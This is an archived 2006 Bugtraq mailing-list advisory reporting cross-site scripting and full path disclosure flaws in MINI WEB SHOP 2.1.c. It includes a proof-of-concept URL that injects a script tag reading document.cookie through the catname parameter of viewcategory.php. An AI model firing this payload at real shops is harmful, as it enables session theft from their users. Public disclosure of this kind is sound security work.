| To: | bugtraq@securityfocus.com |
|---|---|
| Subject: | Multiple Bugs in MINI WEB SHOP |
| From: | xx_hack_xx_2004@hotmail.com |
| Date: | 19 Dec 2006 22:01:49 -0000 |
| Delivered-to: | sp-com-lists@consult.net |
| Delivered-to: | bugtraq-list@securepoint.com |
| Delivered-to: | mailing list bugtraq@securityfocus.com |
| Delivered-to: | moderator for bugtraq@securityfocus.com |
| List-help: | <mailto:bugtraq-help@securityfocus.com> |
| List-id: | <bugtraq.list-id.securityfocus.com> |
| List-post: | <mailto:bugtraq@securityfocus.com> |
| List-subscribe: | <mailto:bugtraq-subscribe@securityfocus.com> |
| List-unsubscribe: | <mailto:bugtraq-unsubscribe@securityfocus.com> |
| Mailing-list: | contact bugtraq-help@securityfocus.com; run by ezmlm |
Hello Vulnerable : MINI WEB SHOP Version: 2.1.c web : http://ObieWebsite.SourceForge.net I Found some bugs ( XSS & Full Path Disclosure ) in MINI WEB SHOP XSS : http://example.com/miniwebshop/modules/viewcategory.php?catname='><script>alert(document.cookie)</script> Full Path Disclosure : http://example.com/miniwebshop/modules/viewcategory.php?catname=[anything] Discovery by Linux_Drox ( Qptan ) Linux_Drox@Saudi.Net.Sa www.LeZr.Com/vb Best Regards ,,, |
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | Oracle <= 9i / 10g File System Access via utl_file Exploit, none |
|---|---|
| Next by Date: | MkPortal Urlobox Cross Site Request Forgery, info |
| Previous by Thread: | Oracle <= 9i / 10g File System Access via utl_file Exploit, none |
| Next by Thread: | MkPortal Urlobox Cross Site Request Forgery, info |
| Indexes: | [Date] [Thread] [Top] [All Lists] |